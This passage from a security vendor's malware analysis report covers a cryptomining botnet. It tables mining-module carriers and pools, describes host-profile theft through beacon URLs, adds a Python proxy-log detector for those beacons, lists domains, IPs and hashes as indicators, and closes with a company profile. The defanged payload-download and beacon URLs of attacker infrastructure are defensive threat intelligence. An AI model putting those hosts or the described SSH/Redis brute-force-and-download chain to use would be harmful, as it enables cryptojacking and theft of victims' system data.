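Read the task store with an account that can open the files (SYSTEM or an administrator) and compare the results against the Task Scheduler UI: a task present on disk but hidden from schtasks output is itself worth a look. The 60-minute cutoff only adds a reason when a cradle or known name was already found, so ordinary hourly maintenance tasks are not flagged on their interval alone.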

8.5 Mining Module Iteration

Over its iterations the mining module has been delivered in several carriers, shellcode, PE files, fileless PowerShell and ELF files, providing mining on both Windows and Linux systems.

Table 8 ‑5 Mining module iteration

File type | Mining pool | Remark
Fileless (shellcode) | 172.105.204.237:443 | The parent file fetches it from hxxp://i.haqo.net/i.png and passes it to the cloud control module through shared memory
Unknown | Unknown | hxxp://dl.hago.net/xmrig-64_1.mlz, hxxp://dl.hago.net/xmrig-32_1.mlz
PE file | Unknown | XMRig, started as a separate process
PowerShell (fileless) | lplp1.beahh.com:443, lplp1.abbny.com:443, lplp1.ackng.net:443, 216.250.99.49:443 | Downloaded by PowerShell and executed in memory. Payloads: hxxp://down.beahh.com/d64.dat (64-bit), hxxp://down.beahh.com/d32.dat (32-bit); hashes c90ecc4e12e085c7fbc571d9ba6d00d4, f21c98d43e678568917dabf121436b74
ELF | lplp.ackng.com:444 | The fileless propagation module adds SSH and Redis brute forcing; after success a script is implanted that downloads the mining program from hxxp://d.ackng.com/ln/xr.zip

8.6 Information Stealing Module Iteration

The information theft mainly collects the target host's computer name, GUID, MAC address, OS version and system time, which are sent as parameters of the HTTP GET requests that download the botnet's components. In addition, the propagation module's email, cookie, FTP and HTTP libraries can steal the target host's cookies and email data.

Table 8 ‑6 Information stealing module iteration

Link
http[:]//dl.haqo.net/updater.exe?ID=yuefmigojqcn&GUID=3B885DD9-1DF9-E54C-A5C5-D08BB6A85DEC&_T=1551595904
http[:]//dl.haqo.net/ins.exez?ID=rzcsyote&GUID=3B885DD9-1DF9-E54C-A5C5-D08BB6A85DEC&_T=1548372990
http[:]//dl.haqo.net/stak.mlz?ID=DGSJ-GUOQUANJU&GUID=5279AC0C-493F-11E2-B45D-A474EB8B2600&_T=1550901673
http[:]//pp.abbny.com/u.png?ID=CICADC&GUID=C9414D56-B061-F3EB-815F-196AE988AC3D&MAC=00:0C:29:88:AC:3D&OS=Windows%208.1&BIT=64&_T=1673568416
http[:]//oo.beahh.com/u.png?_t=1669015209&bit=32&guid=3980a6ba-e025-44f5-ae6e-d2ca02dd47a9&id=tom-pc&mac=52:54:00:d2:51:ea&os=windows%207
http[:]//oo.beahh.com/t.php?ID=WALKER-PC&GUID=08A73516-31A7-11EC-9367-AD3FA9840C81&MAC=16:7C:9A:14:3B:3A&OS=Windows%207&BIT=64&CARD=Standard%20VGA%20Graphics%20Adapter&_T=1634726
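Those GET parameters are a stable fingerprint: the domains rotate (compare the many near-identical names in the IoC list below) but the id/guid/mac/os/bit/_T parameter set does not, and every hit also tells you which host was infected and what its clock read. The following added example (written for this edition, not Antiy's detection logic) scans proxy log lines for this signature and extracts the leaked identifiers. The log lines are constructed; two of them carry URLs from the table above and the third is ordinary traffic with an unrelated id parameter.

```python
import datetime as dt
import re
from urllib.parse import parse_qs, urlsplit

# Constructed proxy log lines: time, client, method, URL, status. The two beacon URLs are
# taken from the table above; the third line is ordinary traffic with an unrelated "id" parameter.
SAMPLE_LOG = """\
2023-01-13T00:06:58Z 10.1.2.33 GET http://pp.abbny.com/u.png?ID=CICADC&GUID=C9414D56-B061-F3EB-815F-196AE988AC3D&MAC=00:0C:29:88:AC:3D&OS=Windows%208.1&BIT=64&_T=1673568416 200
2022-11-21T07:20:09Z 10.1.2.57 GET http://oo.beahh.com/u.png?_t=1669015209&bit=32&guid=3980a6ba-e025-44f5-ae6e-d2ca02dd47a9&id=tom-pc&mac=52:54:00:d2:51:ea&os=windows%207 200
2023-01-13T00:07:10Z 10.1.2.33 GET http://cdn.example/assets/u.png?id=42&v=3 200
"""

IOC_HOSTS = {"dl.haqo.net", "pp.abbny.com", "oo.beahh.com"}   # subset of the section 9 list
GUID_RE = re.compile(r"^[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.I)
MAC_RE = re.compile(r"^([0-9a-f]{2}:){5}[0-9a-f]{2}$", re.I)
PROFILE_KEYS = {"mac", "os", "bit", "_t"}


def classify_url(url):
    """Match on the parameter signature as well as the host: the host list goes stale,
    the host-profile parameter set has stayed the same across the campaigns above."""
    parts = urlsplit(url)
    fields = {k.lower(): v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    reasons = []
    if parts.hostname in IOC_HOSTS:
        reasons.append("host is on the IoC list")
    if "id" in fields and GUID_RE.match(fields.get("guid", "")):
        extra = PROFILE_KEYS & set(fields)
        if len(extra) >= 2:
            reasons.append("host profile in query: id+guid+" + "+".join(sorted(extra)))
    if MAC_RE.match(fields.get("mac", "")):
        reasons.append("MAC address in query")
    host_time = None
    if fields.get("_t", "").isdigit():   # _T is the victim's own clock as a Unix timestamp
        host_time = dt.datetime.fromtimestamp(int(fields["_t"]), dt.timezone.utc).isoformat()
    strong = any(r.startswith(("host is", "host profile")) for r in reasons)
    return {"host": parts.hostname, "fields": fields, "reasons": reasons,
            "host_time": host_time, "match": strong}


def scan_log(text):
    """Return the flagged requests together with the victim identifiers they leaked."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        seen, client, _method, url, _status = line.split()
        verdict = classify_url(url)
        if verdict["match"]:
            hits.append({"seen": seen, "client": client, **verdict})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["seen"], hit["client"], hit["host"], hit["fields"].get("id"),
              hit["fields"].get("mac"), hit["host_time"], "; ".join(hit["reasons"]))
```

The id field is the victim's computer name and mac its adapter address, which is usually enough to map a hit straight to an asset record; a large gap between the proxy time and host_time is worth noting too, since the backdoor's 50-minute schedule means the beacon should be recent.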

9.IoCs

Domain
d[.]ackng.com
d[.]beahh.com
d[.]ttr3p.com
dl[.]hago.net
dl[.]haqo.net
down[.]bddp.net
down[.]beahh.com
down[.]sqlnetcat.com
i[.]hago.net
i[.]haqo.net
ii[.]hago.net
ii[.]haqo.net
info[.]abbny.com
info[.]amynx.com
info[.]beahh.com
info[.]hago.ne
info[.]haqo.net
info[.]zz3r0.com
log[.]bddp.net
loop2[.]hago.net
loop[.]abbbny.com
loop[.]haqo.net
lplp1[.]abbny.com:443
lplp1[.]ackng.net:443
lplp1[.]beahh.com:443
lplp[.]ackng.com:444
o[.]beahh.com
oo[.]beahh.com
oop2[.]hago.net
oop[.]abbbny.com
oop[.]hago.net
p[.]abbny.com
p[.]beahh.com
p[.]estonine.com
pp[.]abbny.com
ppabbny[.]com
pslog[.]estonine.com
pull[.]update[.]ackng[.]com
t[.]ackng.com
t[.]amxny.com
t[.]amynx.com
t[.]amynx.con
t[.]awcna.com
t[.]netcatkit.com
t[.]sqlnetcat.com
t[.]tr2q.com
t[.]zer9g.com
t[.]zz3r0.com
update[.]bddp.net
v[.]bddp.net
v[.]beahh.com
w[.]beahh.com
w[.]zz3r0.com
wbeahh[.]com
IP
172.105.204.237:443
216.250.99.49:443
HASH
F79CB9D2893B254CC75DFB7F3E454A69
74E2A43B2B7C6E258B3A3FC2516C1235
2E9710A4B9CBA3CD11E977AF87570E3B
59B18D6146A2AA066F661599C496090D
30429A24F312153C0EC271CA3FEABF3D
F9144118127FF29D4A49A30B242CEB55
FB89D40E24F5FF55228C38B2B07B2E77
1E0DB9FDBC57525A2A5F5B4C69FAC3BB
5AB6F8CA1F22D88B8EF9A4E39FCA0C03
D4E2EBCF92CF1B2E759FF7CE1F5688CA
32653B2C277F18779C568A1E45CACC0F
AB1C947C0C707C0E0486D25D0AE58148
BC26FD7A0B7FE005E116F5FF2227EA4D
A4B7940B3D6B03269194F728610784D6
85013CC5D7A6DB3BCEE3F6B787BAF957
667A3848B411AF0B6C944D47B559150F
0A4DCD170708F785F314C16797BAADDB
DEF0E980D7C2A59B52D0C644A6E40763
23196DE0EDE25FB9659713FA6799F455
CE924B12FFC55021F5C1BCF308F29704
2FBCE2ECF670EB186C6E3E5886056312
E05827E44D487D1782A32386123193EF
66EA09330BEE7239FCB11A911F8E8EA3
47064F56C84D674AB1935186A365219F
8A2042827A7FCD901510E9A21C9565A8
FA13FD1BB0A2FAAC06CB94592DD6BB1B
6D444144D8E7A07CBA1FD5B042A49012
C90ECC4E12E085C7FBC571D9BA6D00D4
F21C98D43E678568917DABF121436B74
6AA4DE709246FB080C621A6D3E7F9360
DEBE7B1929D4AD269DD8C4B159ABD269
AE0AC43FEBAD2AC885E3F8A020A2103E
07DD4357A22AF86CC73710239E7DBC07
4EC29049AC81521C37DAD2DA6754D6A3
FFEB6DC402F37542889AE2D17B0EDDF2
F1BF55BA24D1A05E80A7CA1D6774AB3D
9ABFFFAF7A4877C9187C3F8A6E59B065
F19D9A77C3F6F07E43F5822F9A796104
8516C4592D8DE8B25DF3A5E9AEFF12E0
8EC31DD982FA038D99FBBBDDFCEB044C
556D5B9FCA78386C15EC59B2E9105E60
43255582721DC0A0796491FE91851630
76E47B53D5D57D7595EF687E9AE92891
3380700C5D87F1F0538DC506FB464FFC
2E2E3ABC4BEB42ED902C4AB820C18AF6
98BF04D3D6E25C0CAC4AC6AF604BCDBF
D4C35DA00EF1122401DF0FB2B0EA782B
4764ADA8BD0665B7EDA593B81DF116E2
3A6714003C362564145108E354F52F39
300967F8E0C01600742CBD4D15844EF0
BBCBEC1A0671B3D67929B628E433A8D5
F444A893A14510684A6490B6748772EF
E6AE2AEF792D3064A24BF7CF935439D8
9D00CCCBB3B73171BF58FE66BF7DAFF7
C08080797A5DA1D05CDBA5760B30B2C1
6965AA9A1EE2B04496D89A6BBCDB37FF
7C029C86CA1ABA2D269BC5C43418CC75
A3CF8550866FBAAF8D98566243B78758
E5AE6D154A6BEFC00DEEA0CCB49DC9B8
88949E6A329C6B2796DDCC81564CEE1A
E3687C56B8BE535398051405F8221D82
7805776504E8A39C2A892D89E2492C12
CC67B69740C7BD0744ACD3242729CE15
99ECCA08236F6CF766D7D8E2CC34EFF6
2977084F9CE3E9E2D356ADAF2B5BDCFD
17703523F5137BC0755A7E4F133FC9D3
8B0CB7A0760E022564465E50CE3271BB
5B3C44B503C7E592E416F68D3924620F
EF3A4697773F84850FE1A086DB8EDFE0
8EC20F2CBAD3103697A63D4444E5C062
AC48B1EA656B7F48C34E66D8E8D84537
D61D88B99C628179FA7CF9F2A310B4FB
F944742B01606605A55C1D55C469F0C9
ABD6F640423A9BF018853A2B40111F76
57812BDE13F512F918A0096AD3E38A07
D8E643C74996BF3C88325067A8FC9D78
125A6199FD32FAFEC11F812358E814F2
FB880DC73E4DB0A43BE8A68EA443BFE1
8D46DBE92242A4FDE2EA29CC277CCA3F
48FBE4B6C9A8EFC11F256BDA33F03460
98F48F31006BE66A8E07B0AB189B6D02
6BB4E93D29E8B78E515653426929C824
E009720BD4BA5A83C4B0080EB3AEA1FB
092478F1E16CBDDB48AFC3EECAF6BE68
CA717602F0700FABA6D2FE014C9E6A8C
888DC1CA4B18A3D424498244ACF81F7D
C21CAA84B327262F2CBCC12BBB510D15
E04ACEC7AB98362D87D1C53D84FC4B03
E49367B9E942CF2B891F60E53083C938
B204EAD0DCC9CA1053A1F26628725850
B6F0E01C9E2676333490A750E58D4464
95ADF923BA32CC5004277867181680C8
31CE6662BE59CA4C01C1730BC7150F19
55F0DD8C306DB9FC8B9E45705CD66598
C17CDEE1AFDC272A46B1CF25C1F44DCC
24C4149468926BEDCB41F50AC88B40F3
3162E619F8EB49F4DD6B48CB09075E10
94838EDD7470271386153D3B89FE6A6C
E561003B347F391EEC44759DE1DA5EBF
FF75C064248579F4BDABEC6D6DBA89D6
2AE7F2F4F0B114ED074BA191ACF1665A
B1BB11AEF730C4B0D2C2C94FDBF2A823
A8BF439DFC1391D5124D4CCCBD6C7664
4D93C29622E285E068B613EF114517FD
46B1DA47A20AFAA11207A493EBFBD090
E47495DA1B30BDA0E42089CA6FC07B62
3C4C0E75810C0FDAE2B0162B42FE04A0
5BB6F5AF311C3A5576379874FC193EF3
E5B8744C220D703F9A0E43F3A202C785
4001BA98A424FDB63047A23AF97EC590
A921B532D5D239E4A2E71E5F853195CD
CFCFC563F33CB2E96F2FF51F6F603FA3


Appendix 2: About Antiy

Antiy is committed to enhancing the network security defense capabilities of its customers and effectively responding to security threats. Through more than 20 years of independent research and development, Antiy has developed technological leadership in areas such as threat detection engines, advanced threat countermeasures, and large-scale threat automation analysis.

Antiy has developed the IEP (Intelligent Endpoint Protection System) security product family for PC, server and other system environments, as well as the UWP (Unified Workload Protect) security products for cloud hosts, containers and other system environments, providing system security capabilities including endpoint antivirus, endpoint protection (EPP), endpoint detection and response (EDR), and Cloud Workload Protection Platform (CWPP), etc. Antiy has established a closed-loop product system of threat countermeasures based on its threat intelligence and threat detection capabilities, achieving perception, retardation, blocking and presentation of advanced threats through products such as the Persistent Threat Detection System (PTD), Persistent Threat Analysis System (PTA), Attack Capture System (ACS), and TDS. For web and business security scenarios, Antiy has launched the PTF Next-generation Web Application and API Protection System (WAAP) and the SCS Code Security Detection System to help customers shift their security capabilities to the left in the DevOps process. At the same time, it has developed four major kinds of security services: network attack and defense logic deduction, in-depth threat hunting, security threat inspection, and regular security operations. Through the Threat Confrontation Operation Platform (XDR), multiple security products and services are integrated to effectively support the upgrade of comprehensive threat confrontation capabilities.

Antiy provides comprehensive security solutions for clients with high security requirements, including network and information authorities, military forces, ministries, confidential industries, and critical information infrastructure. Antiy has participated in the security work of major national political and social events since 2005 and has won honors such as the Outstanding Contribution Award and Advanced Security Group. Since 2015, Antiy’s products and services have provided security support for major spaceflight missions including manned spaceflight, lunar exploration, and space station docking, as well as significant missions such as the maiden flight of large aircraft, escort of main force ships, and Antarctic scientific research. We have received several thank-you letters from relevant departments.

Antiy is a core enabler of the global fundamental security supply chain. Nearly a hundred of the world’s leading security and IT enterprises have chosen Antiy as their partner of detection capability. At present, Antiy’s threat detection engine provides security detection capabilities for over 1.3 million network devices and over 3 billion smart terminal devices worldwide, which has become a “national-level” engine. As of now, Antiy has filed 1,877 patents in the field of cybersecurity and obtained 936 patents. It has been awarded the title of National Intellectual Property Advantage Enterprise and the 17th (2015) China Patent Excellence Award.

Antiy is an important enterprise node in China’s emergency response system and has provided early warning and comprehensive emergency response in major security threats and virus outbreaks such as “Code Red”, “Dvldr”, “Heartbleed”, “Bash Shellcode” and “WannaCry”. Antiy conducts continuous monitoring and in-depth analysis of dozens of advanced cyberspace threat actors (APT groups) such as “Equation”, “White Elephant”, “Lotus” and “Greenspot” and their attack actions, assisting customers in forming effective protection once the adversary situation has been accurately assessed.